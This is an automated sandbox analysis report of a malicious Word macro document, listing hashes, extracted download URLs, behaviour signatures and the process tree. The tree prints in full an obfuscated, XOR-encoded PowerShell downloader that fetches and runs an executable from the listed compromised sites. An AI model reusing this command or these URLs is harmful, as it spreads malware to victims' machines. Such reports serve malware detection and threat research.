Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2024, 04:02
Behavioral task
behavioral1
Sample
af0870e941a776d5efda87418f75870e_JaffaCakes118.doc
Resource
win7-20240221-en
General
-
Target
af0870e941a776d5efda87418f75870e_JaffaCakes118.doc
-
Size
235KB
-
MD5
af0870e941a776d5efda87418f75870e
-
SHA1
4ee9fda5fd9a10b0beff24c15fc73c362a06d12c
-
SHA256
fcf9e5af91a1e9c9c86995546e2174bbe7125f9a027bcd06106bd8f383a8e414
-
SHA512
7a8c5e10051a2e50b59a87fd319aec6f1f1906ae49706574ddce3a85d22730d6647ae359c38822485af958d65df3f880ffc1a3ad9a29b79412c333a9702e38ab
-
SSDEEP
3072:qH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5XyXJm9YBmjD+cb+Xa6aeHWlg:qFVeEsjdXRC3jexGG68YWofpAxIlSwC
Malware Config
Extracted
http://www.optosvet.com/NZJFq7P/
http://janeensart.com/cMn6Qso1ny/
http://www.usugeotechno.com/OLDq8XAVG/
http://www.qpalconsultancy.com/wp-content/gZPTPm/
http://vent-postavka.com/0IPz87qOj/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2596 1208 powershell.exe 93 -
Blocklisted process makes network request 1 IoCs
flow pid Process 31 2596 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
pid Process 1664 550.exe 2980 550.exe 2196 boxesdetect.exe 4420 boxesdetect.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 boxesdetect.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE boxesdetect.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies boxesdetect.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 boxesdetect.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix boxesdetect.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" boxesdetect.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" boxesdetect.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1208 WINWORD.EXE 1208 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 1664 550.exe 1664 550.exe 2980 550.exe 2980 550.exe 2196 boxesdetect.exe 2196 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe 4420 boxesdetect.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2596 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 1208 WINWORD.EXE 1208 WINWORD.EXE 1208 WINWORD.EXE 1208 WINWORD.EXE 1208 WINWORD.EXE 1208 WINWORD.EXE 1208 WINWORD.EXE 1208 WINWORD.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1208 wrote to memory of 2596 1208 WINWORD.EXE 99 PID 1208 wrote to memory of 2596 1208 WINWORD.EXE 99 PID 2596 wrote to memory of 1664 2596 powershell.exe 105 PID 2596 wrote to memory of 1664 2596 powershell.exe 105 PID 2596 wrote to memory of 1664 2596 powershell.exe 105 PID 1664 wrote to memory of 2980 1664 550.exe 108 PID 1664 wrote to memory of 2980 1664 550.exe 108 PID 1664 wrote to memory of 2980 1664 550.exe 108 PID 2196 wrote to memory of 4420 2196 boxesdetect.exe 111 PID 2196 wrote to memory of 4420 2196 boxesdetect.exe 111 PID 2196 wrote to memory of 4420 2196 boxesdetect.exe 111
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\af0870e941a776d5efda87418f75870e_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & ( $SHElLid[1]+$shELLId[13]+'X')( [STRiNg]::joIn('', ([cHaR[]] (1,74, 76 ,104 , 24, 75,64, 82, 8 ,74, 71 , 79 , 64 ,70,81 ,5 , 107 , 64, 81 ,11 ,114 ,64,71 , 102 ,73, 76,64,75 ,81 , 30, 1 ,95, 102 ,124 , 24, 2 , 77 ,81, 81 , 85, 31 , 10, 10 , 82, 82,82,11, 74 ,85 , 81,74, 86, 83 ,64 ,81 ,11 ,70, 74, 72, 10, 107 ,127 ,111, 99 , 84 , 18 ,117 ,10, 101, 77 , 81 , 81 , 85 , 31,10 , 10 , 79,68, 75, 64 , 64, 75, 86 , 68 , 87, 81 ,11,70,74 ,72 , 10 , 70 ,104 , 75 ,19, 116 ,86 , 74 , 20, 75, 92,10 , 101 , 77 , 81,81 , 85, 31 , 10,10,82,82, 82 ,11, 80 , 86,80,66,64,74,81 , 64,70 , 77 , 75 ,74 , 11,70 , 74 ,72,10, 106,105,97, 84 , 29, 125,100 ,115 ,98 ,10 ,101 ,77 ,81 , 81,85 ,31 ,10,10,82 , 82 , 82,11 , 84 ,85 , 68 , 73, 70, 74, 75 ,86,80 , 73 ,81,68 , 75, 70 ,92 , 11 , 70,74 , 72 , 10, 82 , 85,8 , 70 , 74,75, 81 ,64 , 75 , 81,10, 66 , 127 , 117 , 113 , 117 ,72 ,10,101, 77,81,81,85, 31 , 10,10 , 83,64, 75, 81, 8 , 85,74,86 ,81, 68 , 83,78,68 ,11 ,70 ,74 ,72 , 10 ,21 , 108, 117, 95 ,29 , 18 ,84, 106, 79, 10 , 2, 11, 118,85, 73 , 76, 81,13 , 2, 101 ,2,12, 30,1, 79, 79,83, 5 ,24 , 5, 2, 16 , 16,21 ,2,30,1,72 ,82 , 68 ,24 ,1,64, 75 ,83,31 ,81 , 64 , 72 ,85 , 14 ,2, 121,2 , 14 , 1, 79, 79 ,83, 14, 2 , 11,64 ,93,64 ,2 ,30 ,67 ,74 , 87, 64 , 68 ,70,77,13,1 , 112, 81,82, 5,76 , 75, 5,1 ,95, 102 ,124 ,12, 94 ,81 ,87,92 ,94 , 1 ,74, 76,104 , 11 ,97,74,82, 75 ,73 , 74,68 ,65,99, 76 , 73 ,64 , 13 ,1 ,112 , 81 ,82 , 9,5 ,1 , 72,82 ,68,12, 30,118,81, 68 ,87,81 , 8 ,117 , 87 ,74 , 70 ,64 , 86,86, 5,1 , 72,82 , 68 ,30 ,71, 87 ,64 ,68,78, 30 ,88 , 70,68 ,81 , 70,77 , 94 , 88, 88) |fOReaCh-oBJEcT{ [cHaR]($_-BxOr '0x25' ) } ) ) )2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\550.exe"C:\Users\Admin\AppData\Local\Temp\550.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\550.exe"C:\Users\Admin\AppData\Local\Temp\550.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2980
-
-
-
-
C:\Windows\SysWOW64\boxesdetect.exe"C:\Windows\SysWOW64\boxesdetect.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\boxesdetect.exe"C:\Windows\SysWOW64\boxesdetect.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3816 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:4336
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
104KB
MD5f0bb506337373e33321eb5ffa1bf4f7f
SHA14b102e1c43628711cb00b799bd78af70fb6f070f
SHA2562162c42b68af7f56590335a0fcead8e19b1b103acdf0bc3d783db17c9c637999
SHA512a849b8e79861bf573d895dc6b8b0f5977accbbd615c75e3bfc67847aa2effb9a54f2c969178906c2b077e13d85a546384e5eb62e3666ffa87db30bafc70a2884
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82